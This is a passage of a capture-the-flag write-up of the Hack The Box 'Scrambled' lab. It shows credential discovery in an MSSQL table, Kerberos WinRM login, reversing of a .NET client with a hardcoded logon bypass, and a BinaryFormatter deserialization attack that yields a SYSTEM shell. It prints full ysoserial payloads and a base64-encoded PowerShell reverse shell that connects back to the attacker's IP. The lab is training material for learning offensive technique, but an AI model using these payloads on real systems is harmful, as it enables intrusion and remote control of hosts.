SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NULLMiscSvc User
Now remember that the hacker found a password in the DB so I still need to look for that to know is it the same as sqlsvc or the password belonged to someone else
and it actually worked and we got a plain password for the user MiscSvc which is the opposite of what i Guessed (it is actually stored as plain text)
SQL (SCRM\administrator dbo@master)> enum_db
name is_trustworthy_on
---------- -----------------
master 0
tempdb 0
model 0
msdb 1
ScrambleHR 0
SQL (SCRM\administrator dbo@master)> SELECT * FROM ScrambleHR
ERROR(DC1): Line 1: Invalid object name 'ScrambleHR'.
SQL (SCRM\administrator dbo@master)> SELECT * FROM ScrambleHR;
ERROR(DC1): Line 1: Invalid object name 'ScrambleHR'.
SQL (SCRM\administrator dbo@master)> SELECT * FROM master.dbo.ScrambleHR;
ERROR(DC1): Line 1: Invalid object name 'master.dbo.ScrambleHR'.
SQL (SCRM\administrator dbo@master)> enum_db
name is_trustworthy_on
---------- -----------------
master 0
tempdb 0
model 0
msdb 1
ScrambleHR 0
SQL (SCRM\administrator dbo@master)> USE ScrambleHR;
ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
INFO(DC1): Line 1: Changed database context to 'ScrambleHR'.
SQL (SCRM\administrator dbo@ScrambleHR)> Select name FROM sys.tables;
name
----------
Employees
UserImport
Timesheets
SQL (SCRM\administrator dbo@ScrambleHR)> SELECT * FROM Employees
EmployeeID FirstName Surname Title Manager Role
---------- --------- ------- ----- ------- ----
SQL (SCRM\administrator dbo@ScrambleHR)> SELECT * FROM UserImport
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0
SQL (SCRM\administrator dbo@ScrambleHR)>Looking at the bloodhound data the user MiscSvc is part of the IT group which is part of the Remote Management Group meaning we can WINRM in so lets do that
Same as we did before, we got a ticket and lets login
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ kinit MiscSVC@SCRM.LOCAL
Password for MiscSVC@SCRM.LOCAL:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: MiscSVC@SCRM.LOCAL
Valid starting Expires Service principal
06/11/26 07:25:22 06/11/26 17:25:22 krbtgt/SCRM.LOCAL@SCRM.LOCAL
renew until 06/12/26 07:25:15and we got in as miscsvc
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ export KRB5CCNAME=/tmp/krb5cc_1000
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ evil-winrm -i dc1.scrm.local -r SCRM.LOCAL
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\miscsvc\Documents>and we got the user flag
*Evil-WinRM* PS C:\Users\miscsvc\Desktop> type user.txt
23e2f70a55f00f26b64070c5ef5f1bb2
*Evil-WinRM* PS C:\Users\miscsvc\Desktop>ScrambledClient App
One thing keeps bothering me is this app we saw earlier so lets find an exe for it maybe we try to reverse it and see how it works
looking in the Shares folder we find this ScrambledClient.exe which we were looking for so lets download it and reverse it
*Evil-WinRM* PS C:\Shares\IT\Apps> cd 'Sales Order Client'
*Evil-WinRM* PS C:\Shares\IT\Apps\Sales Order Client> dir
Directory: C:\Shares\IT\Apps\Sales Order Client
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/5/2021 8:52 PM 86528 ScrambleClient.exe
-a---- 11/5/2021 8:52 PM 19456 ScrambleLib.dllI downloaded the file to my attacker lets look at this using dotpeek from JetBrains
but before that lets open the app and see what is going on
we get the same picture we saw earlier on the website so lets follow the instruction we saw earlier
now lets add a username and a password for the users we got this for all attempts
so looking at the source code for the login part, we see this
public bool Logon(string Username, string Password)
{
try
{
if (string.Compare(Username, "scrmdev", true) == 0)
{
Log.Write("Developer logon bypass used");
return true;
}
MD5 md5 = MD5.Create();
byte[] bytes = Encoding.ASCII.GetBytes(Password);
byte[] buffer = bytes;
int length = bytes.Length;
Convert.ToBase64String(md5.ComputeHash(buffer, 0, length));
ScrambleNetResponse response = this.SendRequestAndGetResponse(new ScrambleNetRequest(ScrambleNetRequest.RequestType.AuthenticationRequest, $"{Username}|{Password}"));
switch (response.Type)
{
case ScrambleNetResponse.ResponseType.Success:
Log.Write("Logon successful");
return true;
case ScrambleNetResponse.ResponseType.InvalidCredentials:
Log.Write("Logon failed due to invalid credentials");
return false;
default:
throw new ApplicationException(response.GetErrorDescription());
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Exception exception = ex;
Log.Write("Error: " + exception.Message);
throw exception;
}
}there is a user called scrmdev which will let us bypass the authentication and trying it even with a wrong password we get in
and looking in the app there is a functionality called New Order
so lets look at the source code for this functionality
Deserialization Attack
and now everything comes down to what I guessed at the start
this is a text based protocol cause when i tested it with nc at the start we got invalid command, so here is what the app does in the ScrambleNetClient in ScrambleLib.dll
using (StreamWriter streamWriter = new StreamWriter((Stream) stream, Encoding.ASCII)) // it streams plain ASCII code
<SNIP>
`string str = $"{ScrambleNetRequest.GetCodeFromMessageType(Request.Type)};{Request.Parameter}\n";` // it builds the payload using Request.Type and Request.Parameter from inputs
<SNIP>
`byte[] bytes = Encoding.ASCII.GetBytes("QUIT\n");` // it uses \n as a nwe line after each command
<SNIP>
if (this.GetResponse(stream).Type != ScrambleNetResponse.ResponseType.Banner)
throw new ApplicationException("Unexpected response from server on initial connection");but this part is the gold mine
`orders.Add(SalesOrder.DeserializeFromBase64(Base64));`
< SNIP>
`string base64 = NewOrder.SerializeToBase64();`it does deserialization from the client base64 encoded data, so it might be a way for Deserialization so lets check does this deserialization happen with Binary formatter or no
and by looking at this DeserializeFromBase64 function we get this
try
{
byte[] buffer = Convert.FromBase64String(Base64);
BinaryFormatter binaryFormatter = new BinaryFormatter();
Log.Write("Binary formatter init successful");
using (MemoryStream serializationStream = new MemoryStream(buffer))
return (SalesOrder) binaryFormatter.Deserialize((Stream) serializationStream);
}so it is vulnerable to deserialization
why was this BinaryFormatter important ?
BinaryFormatter is dangerous because during deserialization it executes code to reconstruct objects, If you send it a specially crafted payload instead of a real SalesOrder object, it will execute whatever code is embedded in that payload before it even checks if it's a valid SalesOrder
so our plan now is to use ysoserial to generate a fake malicious .Net Object using know gadget chains and send it as payload with this and i got the actual text commands so we can use it with nc instead of the GUI
public class ScrambleNetShared
{
public const string CODE_ERROR_GENERIC = "ERROR_GENERAL";
public const string CODE_SUCCESS = "SUCCESS";
public const string CODE_BANNER = "SCRAMBLECORP_ORDERS_V1.0.3";
public const string CODE_TIMEOUT = "SESSION_TIMED_OUT";
public const string CODE_ERROR_SIZE_LIMIT = "ERROR_SIZE_LIMIT_EXCEEDED";
public const string CODE_ERROR_UNKNOWN_COMMAND = "ERROR_UNKNOWN_COMMAND";
public const string CODE_ERROR_ACCESSDENIED = "ERROR_ACCESS_DENIED";
public const string CODE_ERROR_BAD_CREDS = "ERROR_INVALID_CREDENTIALS";
public const string CODE_LIST_ORDERS = "LIST_ORDERS";
public const string CODE_UPLOAD_ORDER = "UPLOAD_ORDER";
public const string CODE_LOGON = "LOGON";
public const string CODE_QUIT = "QUIT";
public const int ServerPort = 4411;
public const char MessagePartSeparator = ';';
public const char ContentListSeparator = '|';
}Shell as SYSTEM
so using ysoserial
Release> .\ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "whoami > C:\Users\Miscsvc\Desktop\out.txt"
AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA7AlBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBMGdVOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUhkb2IyRnRhU0FtWjNRN0lFTTZYRmRwYm1SdmQzTmNWR1Z0Y0Z4dmRYUXVkSGgwSWlCVGRHRnVaR0Z5WkVWeWNtOXlSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJUZEdGdVpHRnlaRTkxZEhCMWRFVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdWWE5sY2s1aGJXVTlJaUlnVUdGemMzZHZjbVE5SW50NE9rNTFiR3g5SWlCRWIyMWhhVzQ5SWlJZ1RHOWhaRlZ6WlhKUWNtOW1hV3hsUFNKR1lXeHpaU0lnUm1sc1pVNWhiV1U5SW1OdFpDSWdMejROQ2lBZ0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnUEM5elpEcFFjbTlqWlhOelBnMEtJQ0E4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1UFltcGxZM1JKYm5OMFlXNWpaVDROQ2p3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeVBncz0LI've got this so lets copy this chain and move to nc
┌─[192.168.1.2]─[jimmex@attacker]─[~/htb/labs/scrambled/ysoserial/src/main/java/ysoserial/exploit]
└──╼ [★]$ nc 10.129.12.165 4411
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA+AlBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBMndVOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUhkb2IyRnRhU0FtWjNRN0lFTTZYRlZ6WlhKelhFMXBjMk5UZG1OY1JHVnphM1J2Y0Z4dmRYUXVkSGgwSWlCVGRHRnVaR0Z5WkVWeWNtOXlSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJUZEdGdVpHRnlaRTkxZEhCMWRFVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdWWE5sY2s1aGJXVTlJaUlnVUdGemMzZHZjbVE5SW50NE9rNTFiR3g5SWlCRWIyMWhhVzQ5SWlJZ1RHOWhaRlZ6WlhKUWNtOW1hV3hsUFNKR1lXeHpaU0lnUm1sc1pVNWhiV1U5SW1OdFpDSWdMejROQ2lBZ0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnUEM5elpEcFFjbTlqWlhOelBnMEtJQ0E4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1UFltcGxZM1JKYm5OMFlXNWpaVDROQ2p3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeVBncz0Land it returns this
ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation.so lets use the winrm session to see if it actually written to that path
PS C:\Users\Miscsvc\Desktop> dir
Directory: C:\Users\Miscsvc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/11/2026 5:29 PM 21 out.txt
-ar--- 6/11/2026 3:30 PM 34 user.txt
tPS C:\Users\Miscsvc\Desktop> type out.txt
nt authority\systemand as you can see it is running as SYSTEM so lets get a shell
cat shell.ps1 | iconv -t utf16le | base64 -w 0
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA2AC4AOAAz
ACcALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUA
MwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBu
AGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcA
KQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0
AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMA
ZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBh
AG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4A
dAAuAEMAbABvAHMAZQAoACkACgA=first we encoded the shell.ps1 from nishang
then generate the payload using ysoserial -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell -enc BASE64_ENCODED"
then send it
PS C:\Users\Gamel> ncat 10.129.12.165 4411
SCRAMBLECORP_ORDERS_V1.0.3;
rYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUhCdmQyVnljMmhsYkd3Z0xXVnVZeUJLUVVKcVFVZDNRV0ZSUW14QlJ6UkJaRUZCWjBGRU1FRkpRVUpQUVVkVlFXUjNRWFJCUlRoQldXZENjVUZIVlVGWmQwSXdRVU5CUVZWM1FqVkJTRTFCWkVGQ2JFRkhNRUZNWjBKUFFVZFZRV1JCUVhWQlJrMUJZbmRDYWtGSGMwRmFVVUl3UVVoTlFVeG5RbFZCUlUxQlZVRkNSRUZIZDBGaFVVSnNRVWMwUVdSQlFXOUJRMk5CVFZGQmQwRkRORUZOVVVGM1FVTTBRVTFSUVRKQlF6UkJUMEZCZWtGRFkwRk1RVUV3UVVSUlFVNUJRVEJCUTJ0QlQzZEJhMEZJVFVGa1FVSjVRVWRWUVZsUlFuUkJRMEZCVUZGQlowRkRVVUZaZDBKelFVZHJRVnBSUW5WQlNGRkJUR2RDU0VGSFZVRmtRVUpVUVVoUlFXTm5RbXhCUjBWQllsRkJiMEZEYTBGUGQwSmlRVWRKUVdWUlFqQkJSMVZCVjNkQ1pFRkdNRUZLUVVKcFFVaHJRV1JCUW14QlNFMUJTVUZCT1VGRFFVRk5RVUYxUVVNMFFVNW5RVEZCUkZWQlRYZEJNVUZJZDBGS1VVSTNRVVJCUVdaUlFUZEJTR05CWVVGQ2NFRkhkMEZhVVVGdlFVTm5RVXBCUW5CQlEwRkJVRkZCWjBGRFVVRmpkMEl3UVVoSlFWcFJRbWhCUnpCQlRHZENVMEZIVlVGWlVVSnJRVU5uUVVwQlFtbEJTR3RCWkVGQ2JFRklUVUZNUVVGblFVUkJRVXhCUVdkQlExRkJXV2RDTlVGSVVVRmFVVUo2UVVNMFFWUkJRbXhCUnpSQlduZENNRUZIWjBGTFVVRndRVU5CUVV4UlFuVkJSMVZCU1VGQmQwRkRhMEZsZDBFM1FVTlJRVnBCUW1oQlNGRkJXVkZCWjBGRU1FRkpRVUZ2UVVVMFFWcFJRak5CUXpCQlZIZENhVUZIYjBGYVVVSnFRVWhSUVVsQlFYUkJSbEZCWlZGQ2QwRkhWVUZVWjBKb1FVY3dRVnBSUVdkQlJrMUJaVkZDZWtGSVVVRmFVVUowUVVNMFFWWkJRbXhCU0dkQlpFRkJkVUZGUlVGVmQwSkVRVVZyUVZOUlFrWkJSelJCV1hkQ2RrRkhVVUZoVVVKMVFVZGpRVXRSUVhWQlJXTkJXbEZDTUVGR1RVRmtRVUo1UVVkclFXSm5RbTVCUTJkQlNrRkNhVUZJYTBGa1FVSnNRVWhOUVV4QlFYZEJRM2RCU1VGQmEwRkhhMEZMVVVFM1FVTlJRV04zUW14QlJ6UkJXa0ZDYVVGSFJVRlpkMEp5UVVOQlFWQlJRV2RCUTJkQllWRkNiRUZJWjBGSlFVRnJRVWRSUVZsUlFqQkJSMFZCU1VGQmVVRkVORUZLWjBGNFFVTkJRV1pCUVdkQlJUaEJaRkZDTUVGRE1FRlZkMEl3UVVoSlFXRlJRblZCUjJOQlNVRkJjRUZFYzBGS1FVSjZRVWRWUVdKblFtdEJSMGxCV1ZGQ2FrRkhjMEZOWjBGblFVTkJRVkJSUVdkQlExRkJZM2RDYkVGSE5FRmFRVUpwUVVkRlFWbDNRbkpCUTBGQlMzZEJaMEZEWTBGVlFVSlVRVU5CUVVwM1FXZEJRM05CU1VGQmIwRklRVUZrZDBKclFVTnJRVXhuUWxGQlIwVkJaRUZDYjBGRFFVRkxkMEZuUVVOalFWQm5RV2RCUTJOQlQzZEJhMEZJVFVGYVVVSjFRVWRSUVZsblFqVkJTRkZCV2xGQlowRkVNRUZKUVVGdlFVWnpRV1JCUW14QlNHZEJaRUZCZFVGSFZVRmlaMEpxUVVjNFFWcEJRbkJCUnpSQlduZENaRUZFYjBGUFowSkNRVVpOUVZGM1FrcEJSV3RCUzFGQmRVRkZZMEZhVVVJd1FVVkpRV1ZSUWpCQlIxVkJZM2RCYjBGRFVVRmpkMEpzUVVjMFFWcEJRbWxCUjBWQldYZENja0ZFU1VGTFVVRTNRVU5SUVdOM1FqQkJTRWxCV2xGQ2FFRkhNRUZNWjBKWVFVaEpRV0ZSUWpCQlIxVkJTMEZCYTBGSVRVRmFVVUoxUVVkUlFWbG5RalZCU0ZGQldsRkJjMEZFUVVGTVFVRnJRVWhOUVZwUlFuVkJSMUZCV1dkQ05VRklVVUZhVVVGMVFVVjNRVnBSUW5WQlIyTkJaRUZDYjBGRGEwRlBkMEZyUVVoTlFXUkJRbmxCUjFWQldWRkNkRUZETkVGU1owSnpRVWhWUVdOM1FtOUJRMmRCUzFGQ09VRkVjMEZLUVVKcVFVZDNRV0ZSUW14QlJ6UkJaRUZCZFVGRlRVRmlRVUoyUVVoTlFWcFJRVzlCUTJ0QlEyZEJQU0lnVTNSaGJtUmhjbVJGY25KdmNrVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdVM1JoYm1SaGNtUlBkWFJ3ZFhSRmJtTnZaR2x1WnowaWUzZzZUblZzYkgwaUlGVnpaWEpPWVcxbFBTSWlJRkJoYzNOM2IzSmtQU0o3ZURwT2RXeHNmU0lnUkc5dFlXbHVQU0lpSUV4dllXUlZjMlZ5VUhKdlptbHNaVDBpUm1Gc2MyVWlJRVpwYkdWT1lXMWxQU0pqYldRaUlDOCtEUW9nSUNBZ0lDQThMM05rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3o0TkNpQWdQQzlQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWEl1VDJKcVpXTjBTVzV6ZEdGdVkyVStEUW84TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2o0TAs=and as you can see we got the root
Resources
- https://www.jimmexploit.blog/blog/kerberoasting
- https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/silver-ticket-attack/
- https://www.semperis.com/blog/how-to-defend-against-silver-ticket-attacks/
- https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/silver
- https://claroty.com/team82/research/exploiting-a-classic-deserialization-vulnerability-in-siemens-simatic-energy-manager